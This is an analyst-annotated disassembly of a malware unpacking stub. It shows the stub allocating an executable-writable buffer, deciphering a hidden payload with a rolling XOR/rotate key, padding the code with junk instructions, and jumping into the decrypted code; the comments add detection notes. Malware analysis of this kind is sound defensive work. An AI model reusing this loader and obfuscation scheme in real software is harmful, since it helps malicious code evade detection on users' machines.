.text:0040C0B3 ; ---------------------------------------------------------------------------
.text:0040C0B3 ; loc_40C0B3 - unpacking stub (x86-32, Win32 API through the IAT).
.text:0040C0B3 ; 1. Allocates an RWX buffer of 0x674 bytes with VirtualAlloc.
.text:0040C0B3 ; 2. Deciphers 0x674 bytes starting at 0x4BB267 into that buffer, one dword at
.text:0040C0B3 ;    a time (loop at loc_40C10D); the key is re-derived from every deciphered dword.
.text:0040C0B3 ; 3. Pushes offset loc_40C0B3 and the IAT value of GetModuleHandleA, then jumps
.text:0040C0B3 ;    into the buffer through the address saved on the stack at 0x40C10C.
.text:0040C0B3 ; Register roles: ecx = running key, esi = source pointer, edx = destination
.text:0040C0B3 ; pointer, edi = bytes remaining, ebx = dword being deciphered.
.text:0040C0B3 ; eax and every dword_40Fxxx / byte_40Fxxx / unk_40Fxxx operand belong to the
.text:0040C0B3 ; interleaved junk: inside the loop no value from them flows into
.text:0040C0B3 ; ebx/ecx/edx/esi/edi, and the only carry-dependent real instruction
.text:0040C0B3 ; (adc esi, 4) is preceded by clc. Whether the junk stores to 0x40F000-0x40F1FF
.text:0040C0B3 ; matter to code outside this listing is not visible here - confirm before
.text:0040C0B3 ; treating them as pure noise.
.text:0040C0B3 ; Constants (0x40, 0x1000, 0x674) are built as differences of two immediates,
.text:0040C0B3 ; so a plain immediate scan does not show them; values are in the comments.
.text:0040C0B3 ; Observable behaviour for detection: VirtualAlloc(NULL, 0x674, MEM_COMMIT,
.text:0040C0B3 ; PAGE_EXECUTE_READWRITE) followed by a jmp into the returned region.
.text:0040C0B3 ; ---------------------------------------------------------------------------
.text:0040C0B3
.text:0040C0B3 loc_40C0B3: ; CODE XREF: .text:00404A19
.text:0040C0B3 ; DATA XREF: .text:0040C4F2
.text:0040C0B3 xor ecx, ecx
.text:0040C0B5 xor ecx, 3C572FD1h ; ECX = 0x3C572FD1, the initial deciphering key (obfuscated mov)
.text:0040C0BB xor edi, edi
.text:0040C0BD sub edi, 674h
.text:0040C0C3 neg edi ; EDI = 0x674 = number of bytes to copy and decipher (obfuscated mov)
.text:0040C0C5 push ecx ; save the key across the VirtualAlloc call (ecx is caller-saved)
.text:0040C0C6 mov ebx, 28601AAh
.text:0040C0CB sub ebx, 286016Ah
.text:0040C0D1 push ebx ; flProtect = 0x40 (0x28601AA-0x286016A), ie PAGE_EXECUTE_READWRITE
.text:0040C0D2 mov ebx, 286116Ah
.text:0040C0D7 sub ebx, 286016Ah
.text:0040C0DD push ebx ; flAllocationType = 0x1000 (0x286116A-0x286016A), ie MEM_COMMIT
.text:0040C0DE mov esi, 28607DEh
.text:0040C0E3 sub esi, 286016Ah
.text:0040C0E9 push esi ; dwSize = 0x674 (0x28607DE-0x286016A)
.text:0040C0EA mov eax, 0
.text:0040C0EF push eax ; lpAddress = NULL
.text:0040C0F0 call ds:VirtualAlloc ; EAX = VirtualAlloc ( NULL, 0x674, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
.text:0040C0F6 pop ecx ; restore the deciphering key
.text:0040C0F7 cmp eax, 0
.text:0040C0FA jz loc_4033C4 ; if VirtualAlloc failed, terminate (target is outside this listing)
.text:0040C100 sub esi, esi
.text:0040C102 add esi, 4BB267h ; ESI = 0x4BB267, ciphered code and payload hidden in resources (obfuscated mov)
.text:0040C108 sub edx, edx
.text:0040C10A or edx, eax ; EDX = EAX = address of the new RWX block (obfuscated mov)
.text:0040C10C push edx ; save the block address; it is read back through ESP at 0x40C4AC
.text:0040C10D
.text:0040C10D loc_40C10D: ; CODE XREF: .text:0040C4A6j
.text:0040C10D ; Per-dword transform (only the instructions touching ebx/ecx/esi/edx/edi;
.text:0040C10D ; every other instruction in the loop body is junk acting on eax / 0x40Fxxx):
.text:0040C10D ;   ebx = [esi]; esi += 4
.text:0040C10D ;   ebx = ((~ebx - 0x19) ^ ecx) + 1        ; deciphered dword
.text:0040C10D ;   ecx = rol(ebx, 8)                        ; next key (rol 1 then rol 7)
.text:0040C10D ;   [edx] = ebx; edx += 4; edi -= 4
.text:0040C10D ; 0x674 / 4 = 0x19D iterations; edi reaches exactly 0 at the end.
.text:0040C10D sub eax, 0FFFFFFDDh ; junk from here to the next commented instruction
.text:0040C110 adc byte ptr dword_40F032+2, al
.text:0040C116 mov byte ptr dword_40F0D6+3, 10h
.text:0040C11D mov ah, byte ptr dword_40F1AF+3
.text:0040C123 mov eax, dword_40F050+1
.text:0040C128 adc eax, eax
.text:0040C12A xor eax, eax
.text:0040C12C or dword_40F16B+1, eax
.text:0040C132 mov ah, byte ptr dword_40F0B1+1
.text:0040C138 mov byte ptr dword_40F1D1, 27h
.text:0040C13F and dword_40F12B+1, eax
.text:0040C145 add eax, 46h
.text:0040C148 mov byte ptr dword_40F058+2, 0FAh
.text:0040C14F mov eax, dword ptr unk_40F1CF
.text:0040C154 adc eax, 26h
.text:0040C157 mov ebx, [esi] ; EBX = next 4 ciphered bytes from the resources
.text:0040C159 xor al, ah
.text:0040C15B mov al, byte ptr unk_40F117
.text:0040C160 mov eax, dword_40F0C8+1
.text:0040C165 sbb eax, eax
.text:0040C167 mov byte ptr dword_40F032, 77h
.text:0040C16E sbb dword_40F085, eax
.text:0040C174 sub dword_40F19B+2, eax
.text:0040C17A mov dword_40F14E+1, eax
.text:0040C17F sbb dword ptr byte_40F1C1, eax
.text:0040C185 adc eax, eax
.text:0040C187 add eax, eax
.text:0040C189 sub eax, eax
.text:0040C18B sbb dword_40F010+1, eax
.text:0040C191 or eax, 0FFFFFFD7h
.text:0040C194 sub eax, eax
.text:0040C196 clc ; CF = 0 so the adc below is a plain add
.text:0040C197 adc esi, 4 ; ESI += 4: advance the source pointer
.text:0040C19A adc ah, 42h
.text:0040C19D mov eax, dword_40F15D
.text:0040C1A2 add eax, 0FFFFFFEFh
.text:0040C1A5 add eax, eax
.text:0040C1A7 sub dword_40F1DD+2, eax
.text:0040C1AD mov eax, dword_40F0CF+3
.text:0040C1B2 xor eax, eax
.text:0040C1B4 mov eax, dword_40F1E5+1
.text:0040C1B9 mov al, byte ptr unk_40F025
.text:0040C1BE add al, 0B0h
.text:0040C1C0 xor dword ptr unk_40F0D4, eax
.text:0040C1C6 mov eax, dword_40F076+3
.text:0040C1CB mov byte ptr dword_40F15D, 0A7h
.text:0040C1D2 xor eax, 0FFFFFFD8h
.text:0040C1D5 add eax, eax
.text:0040C1D7 not ebx ; step 1: EBX = ~EBX (not does not touch flags)
.text:0040C1D9 mov byte_40F080, 30h
.text:0040C1E0 mov byte ptr dword_40F0DB+2, 36h
.text:0040C1E7 mov dword_40F01D, eax
.text:0040C1EC and eax, 2Eh
.text:0040C1EF and eax, 9
.text:0040C1F2 mov byte ptr dword_40F12B+3, 60h
.text:0040C1F9 add eax, 0Ch
.text:0040C1FC mov byte ptr dword_40F081+1, 40h
.text:0040C203 sbb eax, eax
.text:0040C205 mov byte_40F05E, 0Fh
.text:0040C20C xor eax, eax
.text:0040C20E xor eax, eax
.text:0040C210 mov al, byte ptr dword_40F1C7+3
.text:0040C215 or eax, 0FFFFFFA1h
.text:0040C218 adc dword ptr unk_40F101, eax
.text:0040C21E sub ebx, 19h ; step 2: EBX -= 0x19
.text:0040C221 sub eax, 3Dh
.text:0040C224 xor eax, eax
.text:0040C226 mov byte ptr dword_40F04C+2, 0BCh
.text:0040C22D mov al, byte ptr dword_40F1DD+2
.text:0040C232 add dword_40F0A1+3, eax
.text:0040C238 mov byte ptr dword_40F1D5+3, 93h
.text:0040C23F add eax, 3Eh
.text:0040C242 sbb eax, 0FFFFFFD4h
.text:0040C245 xor byte ptr dword_40F0CF+1, ah
.text:0040C24B sbb eax, eax
.text:0040C24D sbb eax, 7Fh
.text:0040C250 add eax, 0FFFFFF8Ah
.text:0040C253 mov byte_40F132, 0E9h
.text:0040C25A mov byte ptr dword_40F167+2, 0Ch
.text:0040C261 sbb al, 57h
.text:0040C263 xor ebx, ecx ; step 3: EBX ^= current key
.text:0040C265 mov byte ptr unk_40F037, 0Ah
.text:0040C26C xor dword_40F000, eax
.text:0040C272 mov byte ptr dword_40F08E+3, 77h
.text:0040C279 sbb dword_40F00C+2, eax
.text:0040C27F add eax, eax
.text:0040C281 or dword_40F050+3, eax
.text:0040C287 add eax, eax
.text:0040C289 mov eax, dword ptr byte_40F018
.text:0040C28E add eax, eax
.text:0040C290 adc eax, 0FFFFFF89h
.text:0040C293 mov byte ptr dword_40F043+2, 4
.text:0040C29A add dword_40F15D+2, eax
.text:0040C2A0 add eax, 0FFFFFFD8h
.text:0040C2A3 add eax, 0FFFFFFBCh
.text:0040C2A6 xor eax, 4Ah
.text:0040C2A9 inc ebx ; step 4: EBX += 1 -> EBX now holds the deciphered dword
.text:0040C2AA or eax, 42h
.text:0040C2AD sub dword_40F008, eax
.text:0040C2B3 mov eax, dword_40F058
.text:0040C2B8 add eax, 0FFFFFFD6h
.text:0040C2BB xor eax, 19h
.text:0040C2BE add eax, 0FFFFFFB3h
.text:0040C2C1 adc ah, al
.text:0040C2C3 add eax, 0Dh
.text:0040C2C6 sub eax, 0FFFFFFA1h
.text:0040C2C9 add eax, eax
.text:0040C2CB adc eax, 0FFFFFFD0h
.text:0040C2CE add dword_40F14E+1, eax
.text:0040C2D4 mov eax, dword_40F138
.text:0040C2D9 add eax, eax
.text:0040C2DB sbb eax, 0FFFFFFDAh
.text:0040C2DE mov ecx, ebx ; key update: ECX = deciphered dword ...
.text:0040C2E0 add dword_40F1E5+3, eax
.text:0040C2E6 mov eax, dword_40F113+2
.text:0040C2EB mov eax, dword_40F14E
.text:0040C2F0 mov eax, dword ptr byte_40F1C2
.text:0040C2F5 and eax, 0FFFFFF98h
.text:0040C2F8 adc byte ptr dword_40F054+2, ah
.text:0040C2FE mov byte ptr dword_40F065+3, 2Bh
.text:0040C305 add eax, eax
.text:0040C307 mov eax, dword ptr byte_40F103
.text:0040C30C add eax, 0FFFFFF92h
.text:0040C30F mov byte ptr dword_40F054+3, 8Ah
.text:0040C316 mov eax, dword_40F054
.text:0040C31B mov dword_40F1EA, eax
.text:0040C320 mov byte ptr dword_40F060+2, 7Eh
.text:0040C327 sbb eax, eax
.text:0040C329 rol ecx, 1 ; ... rotated left by 1 ...
.text:0040C32B or dword_40F060+3, eax
.text:0040C331 and dword_40F1A6, eax
.text:0040C337 xor eax, eax
.text:0040C339 adc eax, eax
.text:0040C33B adc dword_40F08E, eax
.text:0040C341 mov byte ptr dword_40F17E+1, 4Ch
.text:0040C348 add eax, eax
.text:0040C34A sub eax, eax
.text:0040C34C sub eax, eax
.text:0040C34E mov eax, dword_40F076+2
.text:0040C353 mov eax, dword_40F071+2
.text:0040C358 add al, 4Dh
.text:0040C35A and dword_40F048+1, eax
.text:0040C360 sub eax, eax
.text:0040C362 add eax, eax
.text:0040C364 rol ecx, 7 ; ... then by 7 more: ECX = rol(deciphered dword, 8) is the next key
.text:0040C367 add dword_40F03D+1, eax
.text:0040C36D and eax, 1Fh
.text:0040C370 mov byte ptr dword_40F026+3, 0B6h
.text:0040C377 and eax, 0FFFFFFDAh
.text:0040C37A mov eax, dword ptr unk_40F099
.text:0040C37F adc eax, eax
.text:0040C381 mov al, byte_40F05E
.text:0040C386 sbb eax, 53h
.text:0040C389 mov byte ptr dword_40F0EE+1, 0F6h
.text:0040C390 mov ah, byte ptr dword_40F161+2
.text:0040C396 add eax, 65h
.text:0040C399 xor eax, eax
.text:0040C39B mov byte ptr dword_40F186, 0Ch
.text:0040C3A2 xor dword_40F1F2+1, eax
.text:0040C3A8 adc eax, 0FFFFFF85h
.text:0040C3AB mov [edx], ebx ; store the 4 deciphered bytes into the RWX block
.text:0040C3AD sbb eax, 0FFFFFFB0h
.text:0040C3B0 and dword_40F16B+1, eax
.text:0040C3B6 mov byte ptr dword_40F1F2+1, 3
.text:0040C3BD mov byte ptr dword_40F16B+2, 2Bh
.text:0040C3C4 sub eax, 0FFFFFFA4h
.text:0040C3C7 mov byte_40F09B, 0EFh
.text:0040C3CE xor eax, 7Bh
.text:0040C3D1 adc eax, 0FFFFFFCEh
.text:0040C3D4 adc dword_40F06D+3, eax
.text:0040C3DA xor dword_40F172+3, eax
.text:0040C3E0 mov byte ptr dword_40F15D+2, 59h
.text:0040C3E7 xor dword_40F0DB+3, eax
.text:0040C3ED sbb dword_40F1D1+2, eax
.text:0040C3F3 or dword_40F11C+2, eax
.text:0040C3F9 mov byte ptr dword_40F07A+2, 0E8h
.text:0040C400 lea edx, [edx+4] ; EDX += 4: advance the destination pointer (lea keeps flags)
.text:0040C403 adc dword_40F105+2, eax
.text:0040C409 xor eax, 10h
.text:0040C40C mov byte ptr dword_40F0E7, 0A2h
.text:0040C413 mov byte ptr dword_40F09C+1, 6Ch
.text:0040C41A mov eax, dword_40F014+2
.text:0040C41F mov eax, dword_40F1EE+3
.text:0040C424 add al, ah
.text:0040C426 mov byte ptr unk_40F101, 79h
.text:0040C42D add eax, eax
.text:0040C42F xor byte ptr unk_40F19F, ah
.text:0040C435 and dword_40F113+3, eax
.text:0040C43B add dword ptr byte_40F1C3, eax
.text:0040C441 mov eax, dword_40F1B7
.text:0040C446 mov byte ptr dword_40F043+1, 5Bh
.text:0040C44D mov byte ptr dword_40F0DB+3, 0E9h
.text:0040C454 lea edi, [edi-4] ; EDI -= 4: 4 bytes less to decipher (lea keeps flags)
.text:0040C457 xor eax, 0FFFFFFCBh
.text:0040C45A add eax, eax
.text:0040C45C mov byte ptr dword_40F17E+1, 4Eh
.text:0040C463 mov eax, dword_40F04C
.text:0040C468 mov eax, dword_40F089
.text:0040C46D mov al, byte ptr dword_40F02E+2
.text:0040C472 mov byte ptr unk_40F18F, 0D3h
.text:0040C479 adc dword_40F01D+2, eax
.text:0040C47F sub dword_40F01D+2, eax
.text:0040C485 mov byte_40F196, 28h
.text:0040C48C mov eax, dword_40F08E+1
.text:0040C491 mov byte_40F0ED, 33h
.text:0040C498 adc eax, eax
.text:0040C49A mov byte ptr dword_40F197+3, 0FEh
.text:0040C4A1 sub eax, eax
.text:0040C4A3 cmp edi, 0 ; all 0x674 bytes copied and deciphered ?
.text:0040C4A6 jnz loc_40C10D ; no: next 4 bytes
.text:0040C4AC mov edx, esp ; EDX -> stack slot holding the block address pushed at 0x40C10C
.text:0040C4AE mov esi, ds:GetModuleHandleA ; ESI = IAT value, ie the address of GetModuleHandleA
.text:0040C4B4 push esi ; push the address of GetModuleHandleA (left on the stack for the unpacked code)
.text:0040C4B5 add dword_40F0C8+3, ebx ; junk from here to 0x40C4F2; ebx/ecx/esi/edi are not used again
.text:0040C4BB add esi, esi
.text:0040C4BD sub dword ptr byte_40F03A, eax
.text:0040C4C3 add edi, esi
.text:0040C4C5 add dword_40F00C+1, ecx
.text:0040C4CB and ebx, 0FFFFFFD9h
.text:0040C4CE mov edi, dword_40F065
.text:0040C4D4 adc dword_40F076, ebx
.text:0040C4DA add esi, 0FFFFFFD4h
.text:0040C4DD add eax, ebx
.text:0040C4DF mov esi, dword_40F0B8+1
.text:0040C4E5 xor ecx, esi
.text:0040C4E7 xor ebx, 0FFFFFFA2h
.text:0040C4EA mov esi, dword_40F1D1+2
.text:0040C4F0 xor esi, eax
.text:0040C4F2 push offset loc_40C0B3 ; push this stub's own address; the unpacked code is entered with
.text:0040C4F2 ; [esp] = loc_40C0B3, [esp+4] = GetModuleHandleA, [esp+8] = block address.
.text:0040C4F2 ; Presumably the deciphered code reads these - confirm once it is dumped.
.text:0040C4F7 sub edi, ebx ; junk from here to 0x40C546
.text:0040C4F9 mov byte ptr unk_40F0B5, 96h
.text:0040C500 adc edi, ebx
.text:0040C502 mov byte ptr dword_40F158, 0BFh
.text:0040C509 mov byte ptr dword_40F0E7+2, 0BAh
.text:0040C510 mov ebx, dword_40F043
.text:0040C516 or dword_40F197+1, ecx
.text:0040C51C mov byte ptr dword_40F167+2, 18h
.text:0040C523 add ecx, eax
.text:0040C525 sbb esi, 28h
.text:0040C528 mov byte_40F1C6, 0EDh
.text:0040C52F mov byte ptr dword_40F1DD+1, 5Fh
.text:0040C536 xor eax, esi
.text:0040C538 mov byte ptr dword_40F161, 47h
.text:0040C53F mov byte ptr dword_40F0C4+3, 0ECh
.text:0040C546 jmp dword ptr [edx] ; [edx] = block address: transfer control to the deciphered code (never returns here)
.text:0040C546 ; ---------------------------------------------------------------------------